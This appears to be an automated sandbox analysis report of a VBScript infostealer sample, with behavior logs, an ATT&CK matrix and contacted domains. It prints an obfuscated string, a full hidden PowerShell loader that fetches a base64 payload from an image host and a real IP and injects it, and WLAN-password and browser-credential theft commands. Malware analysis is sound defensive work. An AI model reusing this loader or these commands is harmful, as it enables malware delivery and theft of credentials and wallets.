recdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredkdgtreodgtredgtrevdgtreddgtredgtremqdgtrezdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredgdgtremgdgtre4dgtredqdgtremqdgtrezdgtredgdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links | get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('runpe.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\c\program files\' , 'aburrar','addinprocess32',''))} }"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: AddInProcess32.exe, 00000009.00000002.1735664078.000000000616C000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1674833738.00000000014D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 8168, type: MEMORYSTR
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000300D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
          Source: AddInProcess32.exe, 00000009.00000002.1735664078.000000000616C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: BERT-PC\root\cimv2:Win32_Product.IdentifyingNumber="{4A03706F-666A-4037-7777-5F2748764D10}",Name="Java Auto Updater",Version="2.8.381.9"Jaxx
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000300D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000300D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000300D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-
          Source: powershell.exe, 00000003.00000002.1993317728.00007FFB4B1A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: \\tsclient\C\Program Files\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: \\tsclient\C\Program Files\aburrar.vbsJump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: \\tsclient\C\Program Files\aburrar.vbsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key3.dbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 8168, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 8168, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information221
          Scripting
          Valid Accounts131
          Windows Management Instrumentation
          221
          Scripting
          1
          DLL Side-Loading
          11
          Disable or Modify Tools
          1
          OS Credential Dumping
          1
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution
          1
          DLL Side-Loading
          311
          Process Injection
          3
          Obfuscated Files or Information
          LSASS Memory34
          System Information Discovery
          Remote Desktop Protocol2
          Data from Local System
          1
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts11
          Command and Scripting Interpreter
          11
          Registry Run Keys / Startup Folder
          11
          Registry Run Keys / Startup Folder
          1
          Software Packing
          Security Account Manager1
          Network Share Discovery
          SMB/Windows Admin Shares1
          Email Collection
          11
          Encrypted Channel
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts3
          PowerShell
          Login HookLogin Hook1
          DLL Side-Loading
          NTDS451
          Security Software Discovery
          Distributed Component Object Model1
          Clipboard Data
          3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading
          LSA Secrets1
          Process Discovery
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts161
          Virtualization/Sandbox Evasion
          Cached Domain Credentials161
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
          Process Injection
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          System Network Configuration Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1457271 Sample: Order Inquiry.vbs Startdate: 14/06/2024 Architecture: WINDOWS Score: 100 45 paste.ee 2->45 47 uploaddeimagens.com.br 2->47 49 4 other IPs or domains 2->49 71 Multi AV Scanner detection for domain / URL 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Antivirus detection for URL or domain 2->75 79 13 other signatures 2->79 11 wscript.exe 14 2->11         started        15 msiexec.exe 2->15         started        signatures3 77 Connects to a pastebin service (likely for C&C) 45->77 process4 dnsIp5 59 uploaddeimagens.com.br 188.114.97.3, 443, 49706, 49707 CLOUDFLARENETUS European Union 11->59 99 System process connects to network (likely due to code injection or exploit) 11->99 101 VBScript performs obfuscated calls to suspicious functions 11->101 103 Suspicious powershell command line found 11->103 105 5 other signatures 11->105 17 powershell.exe 7 11->17         started        signatures6 process7 signatures8 65 Suspicious powershell command line found 17->65 67 Found many strings related to Crypto-Wallets (likely being stolen) 17->67 69 Found suspicious powershell code related to unpacking or dynamic code loading 17->69 20 powershell.exe 15 16 17->20         started        24 conhost.exe 17->24         started        process9 dnsIp10 51 93.123.39.71, 49709, 80 NET1-ASBG Bulgaria 20->51 81 Creates autostart registry keys with suspicious values (likely registry only malware) 20->81 83 Writes to foreign memory regions 20->83 85 Opens network shares 20->85 87 Injects a PE file into a foreign processes 20->87 26 AddInProcess32.exe 14 38 20->26         started        30 cmd.exe 1 20->30         started        signatures11 process12 dnsIp13 53 ip-api.com 208.95.112.1, 54305, 80 TUT-ASUS United States 26->53 55 icanhazip.com 104.16.185.241, 54304, 80 CLOUDFLARENETUS United States 26->55 57 whatismyipaddressnow.co 188.114.96.3, 443, 49710, 49713 CLOUDFLARENETUS European Union 26->57 89 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->89 91 Tries to steal Mail credentials (via file / registry access) 26->91 93 Found many strings related to Crypto-Wallets (likely being stolen) 26->93 97 4 other signatures 26->97 32 cmd.exe 1 26->32         started        95 Opens network shares 30->95 35 conhost.exe 30->35         started        signatures14 process15 signatures16 61 Uses netsh to modify the Windows network and firewall settings 32->61 63 Tries to harvest and steal WLAN passwords 32->63 37 netsh.exe 2 32->37         started        39 conhost.exe 32->39         started        41 findstr.exe 1 32->41         started        43 chcp.com 1 32->43         started        process17

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Order Inquiry.vbs5%VirustotalBrowse
          Order Inquiry.vbs0%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          paste.ee1%VirustotalBrowse
          whatismyipaddressnow.co6%VirustotalBrowse
          ip-api.com0%VirustotalBrowse
          uploaddeimagens.com.br5%VirustotalBrowse
          75.103.13.0.in-addr.arpa0%VirustotalBrowse
          icanhazip.com0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          http://x1.c.lencr.org/00%URL Reputationsafe
          http://x1.i.lencr.org/00%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          http://ip-api.com0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://aka.ms/pscore680%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
          http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
          https://aka.ms/pscore60%Avira URL Cloudsafe
          https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
          https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
          https://analytics.paste.ee0%Avira URL Cloudsafe
          https://go.microsoft.co0%Avira URL Cloudsafe
          http://icanhazip.com/0%Avira URL Cloudsafe
          https://chrome.google.com/webstore?hl=enWeb0%Avira URL Cloudsafe
          https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
          https://paste.ee/d/3dasY0%Avira URL Cloudsafe
          https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh0%Avira URL Cloudsafe
          https://www.oracle.com/technetwork/java/javase/downloads0%Avira URL Cloudsafe
          https://www.google.com0%Avira URL Cloudsafe
          http://93.123.39.71/sword.txt100%Avira URL Cloudmalware
          https://paste.ee/d/3dasY00%Avira URL Cloudsafe
          http://icanhazip.com0%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com0%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
          https://paste.ee/d/3dasY40%Avira URL Cloudsafe
          https://secure.gravatar.com0%Avira URL Cloudsafe
          https://www.office.com/0%Avira URL Cloudsafe
          https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
          https://paste.ee/d/3dasY$0%Avira URL Cloudsafe
          https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l0%Avira URL Cloudsafe
          https://www.google.com;0%Avira URL Cloudsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
          https://www.office.com/Office0%Avira URL Cloudsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%Avira URL Cloudsafe
          https://chrome.google.com/webstore?hT0%Avira URL Cloudsafe
          http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%Avira URL Cloudsafe
          https://www.office.com/LR0%Avira URL Cloudsafe
          https://github.com/Pester/Pester0%Avira URL Cloudsafe
          https://uploaddeimagens.com.br0%Avira URL Cloudsafe
          https://paste.ee/_0%Avira URL Cloudsafe
          https://whatismyipaddressnow.co/API/FETCH/getcountry.php0%Avira URL Cloudsafe
          https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?17182841380%Avira URL Cloudsafe
          https://paste.ee/d/3dasYz0%Avira URL Cloudsafe
          http://crt.rootca1.amazontrust.com/rootca1.cer0?0%Avira URL Cloudsafe
          https://analytics.paste.ee;0%Avira URL Cloudsafe
          https://support.mozilla.org0%Avira URL Cloudsafe
          http://whatismyipaddressnow.co0%Avira URL Cloudsafe
          https://paste.ee/H0%Avira URL Cloudsafe
          https://themes.googleusercontent.com0%Avira URL Cloudsafe
          https://whatismyipaddressnow.co0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          paste.ee
          188.114.97.3
          truetrueunknown
          whatismyipaddressnow.co
          188.114.96.3
          truefalseunknown
          ip-api.com
          208.95.112.1
          truetrueunknown
          uploaddeimagens.com.br
          188.114.97.3
          truetrueunknown
          icanhazip.com
          104.16.185.241
          truefalseunknown
          75.103.13.0.in-addr.arpa
          unknown
          unknowntrueunknown
          NameMaliciousAntivirus DetectionReputation
          http://icanhazip.com/false
          • Avira URL Cloud: safe
          unknown
          https://paste.ee/d/3dasYtrue
          • Avira URL Cloud: safe
          unknown
          https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7whtrue
          • Avira URL Cloud: safe
          unknown
          http://93.123.39.71/sword.txtfalse
          • Avira URL Cloud: malware
          unknown
          https://whatismyipaddressnow.co/API/FETCH/getcountry.phptrue
          • Avira URL Cloud: safe
          unknown
          https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138true
          • Avira URL Cloud: safe
          unknown
          http://ip-api.com/line/?fields=hostingfalse
          • URL Reputation: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://duckduckgo.com/chrome_newtabAddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          unknown
          https://duckduckgo.com/ac/?q=AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          unknown
          https://go.microsoft.copowershell.exe, 00000003.00000002.1977414907.000001E4E7D10000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://analytics.paste.eewscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://aka.ms/pscore6powershell.exe, 00000003.00000002.1937420985.000001E4CFCF9000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • URL Reputation: safe
          unknown
          https://chrome.google.com/webstore?hl=enAddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmp, tmp7752.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          unknown
          https://chrome.google.com/webstore?hl=enWebtmp7752.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          unknown
